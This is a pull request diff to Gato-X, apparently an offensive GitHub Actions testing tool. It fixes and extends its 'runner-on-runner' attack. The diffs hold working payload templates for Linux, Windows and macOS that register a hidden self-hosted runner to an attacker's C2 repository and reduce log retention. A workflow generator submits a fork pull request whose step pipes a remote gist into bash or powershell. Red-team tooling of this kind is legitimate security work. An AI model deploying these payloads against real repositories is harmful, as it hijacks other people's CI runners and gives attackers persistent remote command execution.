### PR TITLE
Fix broken windows RoR and improve attack UX.

### DIFF
--- a/gatox/attack/attack.py
+++ b/gatox/attack/attack.py
@@ -90,6 +90,8 @@ class Attacker:
                 result.json()["id"],
                 result.json()["files"][f"{gist_name}-{random_id}"]["raw_url"],
             )
+        else:
+            Output.error("Failed to create Gist!")
 
     def execute_and_wait_workflow(
         self,

--- a/gatox/attack/payloads/payloads.py
+++ b/gatox/attack/payloads/payloads.py
@@ -48,7 +48,8 @@ jobs:
 REG_TOKEN=`echo "{0}" | base64 -d`
 C2_REPO={1}
 KEEP_ALIVE={4}
-
+export WORKER_LOGRETENTION=1
+export RUNNER_LOGRETENTION=1
 mkdir -p $HOME/.actions-runner1/ && cd $HOME/.actions-runner1/
 curl -o {2} -L https://github.com/actions/runner/releases/download/{3}/{2} > /dev/null 2>&1
 tar xzf ./{2}
@@ -65,6 +66,8 @@ fi
 
     ROR_GIST_WINDOWS = """
 $keep_alive = ${4}
+$env:RUNNER_LOGRETENTION=1
+$env:WORKER_LOGRETENTION=1
 mkdir C:\\.actions-runner1; cd C:\\.actions-runner1
 Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/{3}/{2} -OutFile {2}
 Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory("$PWD/{2}", "$PWD")
@@ -79,6 +82,8 @@ REG_TOKEN=`echo "{0}" | base64 -d`
 C2_REPO={1}
 KEEP_ALIVE={4}
 
+export WORKER_LOGRETENTION=1
+export RUNNER_LOGRETENTION=1
 mkdir -p $HOME/runner/.actions-runner/ && cd $HOME/runner/.actions-runner/
 curl -o {2} -L https://github.com/actions/runner/releases/download/{3}/{2} > /dev/null 2>&1
 tar xzf ./{2}

--- a/gatox/attack/payloads/payloads.py
+++ b/gatox/attack/payloads/payloads.py
@@ -1,5 +1,6 @@
 import yaml
 
+
 class Payloads:
     """Collection of payload template used for various attacks."""
 
@@ -123,7 +124,11 @@ fi
 
     @staticmethod
     def create_ror_workflow(
-        workflow_name: str, run_name: str, gist_url: str, runner_labels: list, target_os: str = "linux"
+        workflow_name: str,
+        run_name: str,
+        gist_url: str,
+        runner_labels: list,
+        target_os: str = "linux",
     ):
         """ """
         yaml_file = {}

--- a/gatox/attack/payloads/payloads.py
+++ b/gatox/attack/payloads/payloads.py
@@ -1,3 +1,5 @@
+import yaml
+
 class Payloads:
     """Collection of payload template used for various attacks."""
 
@@ -62,12 +64,14 @@ fi
 """
 
     ROR_GIST_WINDOWS = """
+$keep_alive = ${4}
 mkdir C:\\.actions-runner1; cd C:\\.actions-runner1
 Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/{3}/{2} -OutFile {2}
 Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory("$PWD/{2}", "$PWD")
-./config.cmd --url https://github.com/{1} --unattended --token {0} --name "gatox-{5}"
+./config.cmd --url https://github.com/{1} --unattended --token {0} --name "gatox-{5}" --labels "gatox-{5}"
 $env:RUNNER_TRACKING_ID=0
-Start-Process -WindowStyle Hidden -FilePath "./run.cmd"
+
+if ($keep_alive) {{ ./run.cmd }} else {{ Start-Process -WindowStyle Hidden -FilePath "./run.cmd" }}
 """
 
     ROR_GIST_MACOS = """
@@ -111,3 +115,33 @@ else
   exit 0
 fi
 """
+
+    @staticmethod
+    def create_ror_workflow(
+        workflow_name: str, run_name: str, gist_url: str, runner_labels: list, target_os: str = "linux"
+    ):
+        """ """
+        yaml_file = {}
+
+        yaml_file["name"] = workflow_name
+        yaml_file["run-name"] = run_name if run_name else workflow_name
+        yaml_file["on"] = ["pull_request"]
+
+        if target_os == "linux" or target_os == "osx":
+            run_payload = f"curl -sSfL {gist_url} | bash > /dev/null 2>&1"
+        elif target_os == "win":
+            run_payload = f"curl -sSfL {gist_url} | powershell *> $null"
+
+        test_job = {
+            "runs-on": runner_labels,
+            "steps": [
+                {
+                    "name": "Run Tests",
+                    "run": run_payload,
+                    "continue-on-error": "true",
+                }
+            ],
+        }
+        yaml_file["jobs"] = {"testing": test_job}
+
+        return yaml.dump(yaml_file, sort_keys=False, default_style="", width=4096)

--- a/gatox/attack/runner/webshell.py
+++ b/gatox/attack/runner/webshell.py
@@ -131,7 +131,7 @@ class WebShell(Attacker):
         yaml_name: str = "tests",
         workflow_name: str = "Testing",
         run_name: str = "Testing",
-        c2_repo: str = None
+        c2_repo: str = None,
     ):
         """Performs a runner-on-runner attack using the fork pull request technique.
 
@@ -414,7 +414,7 @@ class WebShell(Attacker):
                 f"/repos/{c2_repo}/actions/runners/registration-token"
             )
             if token_resp.status_code == 201:
-                registration_token = token_resp.json()["token"] 
+                registration_token = token_resp.json()["token"]
             else:
                 Output.error(f"Unable to retrieve registration token for {c2_repo}!")
                 return None
@@ -431,12 +431,12 @@ class WebShell(Attacker):
                 )
             elif target_os == "win":
                 return Payloads.ROR_GIST_WINDOWS.format(
-                    registration_token, 
+                    registration_token,
                     c2_repo,
                     release_file,
-                    name, 
+                    name,
                     "true" if keep_alive else "false",
-                    random_name
+                    random_name,
                 )
             elif target_os == "osx":
                 return Payloads.ROR_GIST_MACOS.format(
@@ -450,7 +450,6 @@ class WebShell(Attacker):
         else:
             Output.error("Unable to retrieve runner version!")
             return None
-
 
     def issue_command(
         self,
@@ -589,8 +588,12 @@ class WebShell(Attacker):
             for runner in runners:
                 runner_name = runner["name"]
 
-                labels = ", ".join([Output.yellow(label["name"]) for label in runner["labels"]])
+                labels = ", ".join(
+                    [Output.yellow(label["name"]) for label in runner["labels"]]
+                )
                 status = runner["status"]
-                Output.tabbed(f"Name: {Output.red(runner_name)} - Labels: {labels} - Status: {Output.bright(status)}")
+                Output.tabbed(
+                    f"Name: {Output.red(runner_name)} - Labels: {labels} - Status: {Output.bright(status)}"
+                )
         else:
             Output.error("No runners connected to C2 repository!")

--- a/gatox/attack/runner/webshell.py
+++ b/gatox/attack/runner/webshell.py
@@ -587,10 +587,10 @@ class WebShell(Attacker):
 
             Output.info(f"There are {len(runners)} runner(s) connected to {c2_repo}:")
             for runner in runners:
-
                 runner_name = runner["name"]
 
-                labels = ", ".join([label["name"] for label in runner["labels"]])
-                Output.tabbed(f"Name: {runner_name} - Labels: {labels}")
+                labels = ", ".join([Output.yellow(label["name"]) for label in runner["labels"]])
+                status = runner["status"]
+                Output.tabbed(f"Name: {Output.red(runner_name)} - Labels: {labels} - Status: {Output.bright(status)}")
         else:
             Output.error("No runners connected to C2 repository!")

--- a/gatox/attack/runner/webshell.py
+++ b/gatox/attack/runner/webshell.py
@@ -47,31 +47,6 @@ class WebShell(Attacker):
 
     LINE_PATTERN = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{7}Z\s(.*)$")
 
-    @staticmethod
-    def create_ror_workflow(
-        workflow_name: str, run_name: str, gist_url: str, runner_labels: list
-    ):
-        """ """
-        yaml_file = {}
-
-        yaml_file["name"] = workflow_name
-        yaml_file["run-name"] = run_name if run_name else workflow_name
-        yaml_file["on"] = ["pull_request"]
-
-        test_job = {
-            "runs-on": runner_labels,
-            "steps": [
-                {
-                    "name": "Run Tests",
-                    "run": f"curl -sSfL {gist_url} | bash > /dev/null 2>&1",
-                    "continue-on-error": "true",
-                }
-            ],
-        }
-        yaml_file["jobs"] = {"testing": test_job}
-
-        return yaml.dump(yaml_file, sort_keys=False, default_style="", width=4096)
-
     def setup_payload_gist_and_workflow(
         self, c2_repo, target_os, target_arch, keep_alive=False
     ):
@@ -94,7 +69,15 @@ class WebShell(Attacker):
         ror_gist = self.format_ror_gist(
             c2_repo, target_os, target_arch, keep_alive=keep_alive
         )
+
+        if not ror_gist:
+            Output.error("Failed to format runner-on-runner Gist!")
+            return None, None
+
         gist_id, gist_url = self.create_gist("runner", ror_gist)
+
+        if not gist_url:
+            return None, None
 
         Output.info(f"Successfully created runner-on-runner Gist at {gist_url}!")
 
@@ -102,22 +85,33 @@ class WebShell(Attacker):
 
     def payload_only(
         self,
-        c2_repo: str,
         target_os: str,
         target_arch: str,
         requested_labels: list,
         keep_alive: bool = False,
+        c2_repo: str = None,
         workflow_name: str = "Testing",
         run_name: str = "Testing",
     ):
         """Generates payload gist and prints RoR workflow."""
         self.setup_user_info()
 
-        gist_id, gist_url = self.setup_payload_gist_and_workflow(
+        if not c2_repo:
+            c2_repo = self.configure_c2_repository()
+            Output.info(f"Created C2 repository: {Output.bright(c2_repo)}")
+        else:
+            Output.info(f"Using provided C2 repository: {Output.bright(c2_repo)}")
+
+        _, gist_url = self.setup_payload_gist_and_workflow(
             c2_repo, target_os, target_arch, keep_alive=keep_alive
         )
-        ror_workflow = WebShell.create_ror_workflow(
-            workflow_name, run_name, gist_url, requested_labels
+
+        if not gist_url:
+            Output.error("Failed to create Gist!")
+            return
+
+        ror_workflow = Payloads.create_ror_workflow(
+            workflow_name, run_name, gist_url, requested_labels, target_os=target_os
         )
 
         Output.info("RoR Workflow below:\n")
@@ -137,6 +131,7 @@ class WebShell(Attacker):
         yaml_name: str = "tests",
         workflow_name: str = "Testing",
         run_name: str = "Testing",
+        c2_repo: str = None
     ):
         """Performs a runner-on-runner attack using the fork pull request technique.
 
@@ -155,18 +150,18 @@ class WebShell(Attacker):
             Output.error("Insufficient scopes for attacker PAT!")
             return False
 
-        ## TODO: Provide option to re-use an existing C2 repository.
-        ## Initial steps, preparing C2 and payloads
-        c2_repo = self.configure_c2_repository()
-
-        Output.info(f"Created C2 repository: {Output.bright(c2_repo)}")
+        if not c2_repo:
+            c2_repo = self.configure_c2_repository()
+            Output.info(f"Created C2 repository: {Output.bright(c2_repo)}")
+        else:
+            Output.info(f"Using provided C2 repository: {Output.bright(c2_repo)}")
 
         gist_id, gist_url = self.setup_payload_gist_and_workflow(
             c2_repo, target_os, target_arch, keep_alive=keep_alive
         )
 
-        ror_workflow = WebShell.create_ror_workflow(
-            workflow_name, run_name, gist_url, requested_labels
+        ror_workflow = Payloads.create_ror_workflow(
+            workflow_name, run_name, gist_url, requested_labels, target_os=target_os
         )
 
         Output.info(
@@ -413,12 +408,13 @@ class WebShell(Attacker):
             name = release[0]["tag_name"]
             version = name[1:]
 
-            release_file = f"actions-runner-{target_os}-{target_arch}-{version}.tar.gz"
+            # File name varies by OS.
+            release_file = f"actions-runner-{target_os}-{target_arch}-{version}.{target_os == 'win' and 'zip' or 'tar.gz'}"
             token_resp = self.api.call_post(
                 f"/repos/{c2_repo}/actions/runners/registration-token"
             )
             if token_resp.status_code == 201:
-                registration_token = token_resp.json()["token"]
+                registration_token = token_resp.json()["token"] 
             else:
                 Output.error(f"Unable to retrieve registration token for {c2_repo}!")
                 return None
@@ -433,9 +429,14 @@ class WebShell(Attacker):
                     "true" if keep_alive else "false",
                     random_name,
                 )
-            elif target_os == "windows":
+            elif target_os == "win":
                 return Payloads.ROR_GIST_WINDOWS.format(
-                    registration_token, c2_repo, release_file, name
+                    registration_token, 
+                    c2_repo,
+                    release_file,
+                    name, 
+                    "true" if keep_alive else "false",
+                    random_name
                 )
             elif target_os == "osx":
                 return Payloads.ROR_GIST_MACOS.format(
@@ -446,6 +447,10 @@ class WebShell(Attacker):
                     "true" if keep_alive else "false",
                     random_name,
                 )
+        else:
+            Output.error("Unable to retrieve runner version!")
+            return None
+
 
     def issue_command(
         self,

--- a/gatox/cli/attack/config.py
+++ b/gatox/cli/attack/config.py
@@ -152,10 +152,16 @@ def configure_parser_attack(parser):
     )
 
     parser.add_argument(
-        "--interact",
+        "--c2-repo",
         metavar="C2_REPO",
-        help="Interact with a C2 repository with an existing runner-on-runner.",
-        type=StringType(10),
+        help="Name of an existing Gato-X C2 repository in Owner/Repo format."
+    )
+
+    parser.add_argument(
+        "--interact",
+        action="store_true",
+        help="Connect to a C2 repository and interact with connected runners.",
+        default=False,
     )
 
     parser.add_argument(
@@ -170,7 +176,7 @@ def configure_parser_attack(parser):
         "--target-os",
         metavar="TARGET_OS",
         help="Operating system for Runner-on-Runner attack. Options: windows, linux, osx.",
-        choices=["windows", "linux", "osx"],
+        choices=["win", "linux", "osx"],
     )
 
     parser.add_argument(
@@ -189,15 +195,7 @@ def configure_parser_attack(parser):
 
     parser.add_argument(
         "--payload-only",
-        metavar="C2_REPO",
-        help="Generaate payloads with the specified C2 repository. Used for manually deploying runner on runner.",
+        help="Generaate payloads with the specified C2 repository or creates a new one. Used for manually deploying runner on runner.",
         default=False,
-        type=StringType(64),
-    )
-
-    parser.add_argument(
-        "--runner-name",
-        metavar="RUNNER_NAME",
-        help="Name of the runner to be used in the attack. Required if using --interact.",
-        type=StringType(64),
+        action="store_true",
     )

--- a/gatox/cli/attack/config.py
+++ b/gatox/cli/attack/config.py
@@ -154,7 +154,7 @@ def configure_parser_attack(parser):
     parser.add_argument(
         "--c2-repo",
         metavar="C2_REPO",
-        help="Name of an existing Gato-X C2 repository in Owner/Repo format."
+        help="Name of an existing Gato-X C2 repository in Owner/Repo format.",
     )
 
     parser.add_argument(

--- a/gatox/cli/cli.py
+++ b/gatox/cli/cli.py
@@ -195,8 +195,9 @@ def attack(args, parser):
         )
 
         if args.payload_only:
+            
             gh_attack_runner.payload_only(
-                args.payload_only, args.target_os, args.target_arch, args.labels
+                args.target_os, args.target_arch, args.labels, c2_repo=args.c2_repo, keep_alive=args.keep_alive
             )
         elif args.runner_on_runner:
             gh_attack_runner.runner_on_runner(
@@ -212,9 +213,15 @@ def attack(args, parser):
                 yaml_name=args.file_name,
                 run_name=args.name,
                 workflow_name=args.name,
+                c2_repo=args.c2_repo,
             )
         elif args.interact:
-            gh_attack_runner.interact_webshell(args.interact)
+            if args.c2_repo:
+                gh_attack_runner.interact_webshell(args.c2_repo)
+            else:
+                parser.error(
+                    f"{Fore.RED}[!] You must specify a C2 repo to interact with!"
+                )
 
     elif args.workflow:
         gh_attack_runner = Attacker(

--- a/gatox/cli/cli.py
+++ b/gatox/cli/cli.py
@@ -195,9 +195,13 @@ def attack(args, parser):
         )
 
         if args.payload_only:
-            
+
             gh_attack_runner.payload_only(
-                args.target_os, args.target_arch, args.labels, c2_repo=args.c2_repo, keep_alive=args.keep_alive
+                args.target_os,
+                args.target_arch,
+                args.labels,
+                c2_repo=args.c2_repo,
+                keep_alive=args.keep_alive,
             )
         elif args.runner_on_runner:
             gh_attack_runner.runner_on_runner(

--- a/unit_test/test_payloads.py
+++ b/unit_test/test_payloads.py
@@ -7,3 +7,28 @@ def test_create_malicious_push_yaml():
     yaml = CICDAttack.create_push_yml("whoami", "testing")
 
     assert "run: whoami" in yaml
+
+
+def test_ror_workflow_default():
+
+    workflow = Payloads.create_ror_workflow(
+        "foobar",
+        "evil",
+        "https://example.com",
+        runner_labels=["self-hosted", "super-secure"],
+    )
+
+    assert "continue-on-error: true" in workflow
+
+def test_ror_workflow_win():
+
+    workflow = Payloads.create_ror_workflow(
+        "foobar",
+        "evil",
+        "https://example.com",
+        runner_labels=["self-hosted", "super-secure"],
+        target_os="win"
+    )
+
+    assert "continue-on-error: true" in workflow
+    assert "powershell" in workflow

--- a/unit_test/test_payloads.py
+++ b/unit_test/test_payloads.py
@@ -20,6 +20,7 @@ def test_ror_workflow_default():
 
     assert "continue-on-error: true" in workflow
 
+
 def test_ror_workflow_win():
 
     workflow = Payloads.create_ror_workflow(
@@ -27,7 +28,7 @@ def test_ror_workflow_win():
         "evil",
         "https://example.com",
         runner_labels=["self-hosted", "super-secure"],
-        target_os="win"
+        target_os="win",
     )
 
     assert "continue-on-error: true" in workflow

--- a/unit_test/test_webshell.py
+++ b/unit_test/test_webshell.py
@@ -3,14 +3,3 @@ from unittest.mock import MagicMock
 
 from gatox.attack.runner.webshell import WebShell
 
-
-def test_ror_workflow():
-
-    workflow = WebShell.create_ror_workflow(
-        "foobar",
-        "evil",
-        "https://example.com",
-        runner_labels=["self-hosted", "super-secure"],
-    )
-
-    assert "continue-on-error: true" in workflow

--- a/unit_test/test_webshell.py
+++ b/unit_test/test_webshell.py
@@ -2,4 +2,3 @@ from unittest.mock import patch
 from unittest.mock import MagicMock
 
 from gatox.attack.runner.webshell import WebShell
-


### PR DESCRIPTION
This PR does the following:

* Fixes broken Windows RoR payload.
* Changes the --interact flag to require a --c2-repo as well.
* Updated --payload-only to not require a C2 repo. In that case, Gato-X will create a new C2 repository.
* Misc error handling improvements.

The CLI changes are technically breaking changes, but given that the attack features are not to be used as part of automation this should not break workflows (no one should be running attack at scale on public repos).